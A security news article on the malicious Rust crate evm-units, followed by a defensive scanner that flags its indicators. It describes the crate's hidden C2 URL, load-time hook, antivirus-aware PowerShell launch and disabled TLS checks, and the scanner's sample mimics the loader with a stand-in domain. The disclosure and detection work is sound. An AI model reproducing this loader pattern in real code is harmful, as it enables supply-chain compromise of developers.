Malicious Rust Crate evm-units Mimics an EVM Version Check and Silently Executes OS-specific Payloads

The open-source software supply chain recently encountered a deceptive threat in the form of evm-units, a malicious Rust crate published by the author ablerust.

Masquerading as a standard utility for verifying Ethereum Virtual Machine (EVM) versions, the package accumulated thousands of downloads before it was removed.

While the library appeared to perform legitimate version checks, it concealed a sophisticated payload loader that silently compromised systems upon execution.

The malware’s primary attack vector involved the function get_evm_version(). Instead of simply returning a version number, this function decoded a Base64 string to retrieve a remote command-and-control URL.

The attack was further amplified by a secondary package, uniswap-utils, which depended on evm-units and automatically invoked the malicious code during initialization via the ctor crate's #[ctor::ctor] attribute, which runs the annotated function before main() as soon as the library is loaded.

This clever dependency chaining allowed the malware to infect developers’ environments without requiring direct interaction with the malicious crate, effectively turning a benign helper tool into a Trojan horse.

Socket.dev security analysts identified the malware’s distinct focus on stealth and targeted evasion after analyzing the crate’s behavior.

Their research highlighted that payload execution was heavily customized to the victim's operating system: the loader sent an OS-specific User-Agent header (linux, darwin, or win32) so that the server returned a payload matching that platform.

OS-Specific Infection Logic

The malware's sophistication is most evident in its internal check() function, which uses Rust's conditional compilation attributes (#[cfg(target_os = "linux")], #[cfg(target_os = "macos")], #[cfg(target_os = "windows")]) to compile a different execution path for each platform.

On Linux and macOS, the code downloads a script to the temporary directory and executes it using nohup to prevent visible output, ensuring the victim remains unaware.

The Windows implementation demonstrates even higher complexity by scanning for qhsafetray.exe, a process associated with the Chinese antivirus Qihoo 360.

uniswap-utils dependency alert on Socket since it has a dependency containing malware (which is evm-units) (Source - Socket.dev)

If the antivirus is absent, the malware constructs a VBScript to launch a hidden PowerShell instance.

Conversely, if the antivirus is present, it adapts by executing PowerShell directly with suppressed creation flags to avoid heuristic detection mechanisms, demonstrating an acute awareness of defensive tools.

if !is_360 {
    let vbscript_code = format!(
        r#"Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe ...", 0, False"#
    );
}

This granular targeting suggests the threat actors specifically aimed to harvest cryptocurrency credentials from users in Asian markets.

By calling danger_accept_invalid_certs(true) on the HTTP client builder, the attackers disabled TLS certificate validation, allowing their infrastructure to operate on self-signed certificates without tripping the client's normal chain verification and complicating efforts to block the malicious domains.
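The three code-level indicators the article describes (a #[ctor::ctor] constructor that runs on load, a Base64 string that decodes to a command-and-control URL, and danger_accept_invalid_certs(true) disabling TLS validation) can be checked for across vendored dependency sources before a build. The following scanner is an added example written for this article, not code from Socket.dev or from the evm-units or uniswap-utils crates; it uses only the Rust standard library, and the function names, the Finding type and the SAMPLE_SRC snippet (including its Base64 literal, which encodes a reserved example domain) are constructed for illustration.

```rust
// Added example: a std-only scanner that flags the load-time constructor,
// the disabled TLS verification, and any string literal that is Base64 and
// decodes to an http(s) URL. Names and sample input are constructed here.

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub line: usize,
    pub indicator: String,
}

/// Decode standard Base64 (optional '=' padding) into bytes.
/// Returns None if any character is outside the Base64 alphabet.
pub fn b64_decode(s: &str) -> Option<Vec<u8>> {
    let mut out = Vec::new();
    let mut acc: u32 = 0;
    let mut bits: u32 = 0;
    for c in s.bytes() {
        let v = u32::from(match c {
            b'A'..=b'Z' => c - b'A',
            b'a'..=b'z' => c - b'a' + 26,
            b'0'..=b'9' => c - b'0' + 52,
            b'+' => 62,
            b'/' => 63,
            b'=' => break, // padding: stop decoding
            _ => return None,
        });
        acc = (acc << 6) | v;
        bits += 6;
        if bits >= 8 {
            bits -= 8;
            out.push(((acc >> bits) & 0xff) as u8);
        }
    }
    Some(out)
}

/// Heuristic: long enough, Base64 alphabet only, length a multiple of four.
fn looks_like_b64(s: &str) -> bool {
    s.len() >= 16
        && s.len() % 4 == 0
        && s.bytes().all(|b| b.is_ascii_alphanumeric() || b == b'+' || b == b'/' || b == b'=')
}

/// Double-quoted string literals on one line (no escape handling; enough
/// for the encoded-URL pattern the article describes).
fn string_literals(line: &str) -> Vec<&str> {
    line.split('"').skip(1).step_by(2).collect()
}

/// Scan Rust source text and return one Finding per indicator hit.
pub fn scan_source(src: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    for (idx, line) in src.lines().enumerate() {
        let lineno = idx + 1;
        let mut hit = |indicator: &str| {
            findings.push(Finding { line: lineno, indicator: indicator.to_string() })
        };
        if line.contains("#[ctor::ctor]") {
            hit("load-time constructor (#[ctor::ctor]) runs code before main()");
        }
        if line.contains("danger_accept_invalid_certs(true)") {
            hit("TLS certificate validation disabled");
        }
        for lit in string_literals(line) {
            if !looks_like_b64(lit) {
                continue;
            }
            if let Some(bytes) = b64_decode(lit) {
                if let Ok(text) = std::str::from_utf8(&bytes) {
                    if text.starts_with("http://") || text.starts_with("https://") {
                        hit(&format!("Base64-encoded URL literal decodes to {}", text));
                    }
                }
            }
        }
    }
    findings
}

/// Constructed sample mimicking the pattern described in the article; the
/// Base64 literal decodes to https://example.invalid/ (a reserved domain).
pub const SAMPLE_SRC: &str = r#"use reqwest::blocking::Client;

#[ctor::ctor]
fn init() { let _ = get_evm_version(); }

fn get_evm_version() -> String {
    let url = decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv");
    let client = Client::builder().danger_accept_invalid_certs(true).build().unwrap();
    client.get(url).header("User-Agent", "linux").send().unwrap().text().unwrap()
}
"#;

fn main() {
    for f in scan_source(SAMPLE_SRC) {
        println!("line {}: {}", f.line, f.indicator);
    }
}
```

In practice you would run scan_source over every .rs file under the cargo vendor directory (or under ~/.cargo/registry/src) and fail the build on any hit; the Base64 heuristic is deliberately narrow (it only reports literals that decode to a URL) so that ordinary embedded keys and test vectors do not produce noise.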
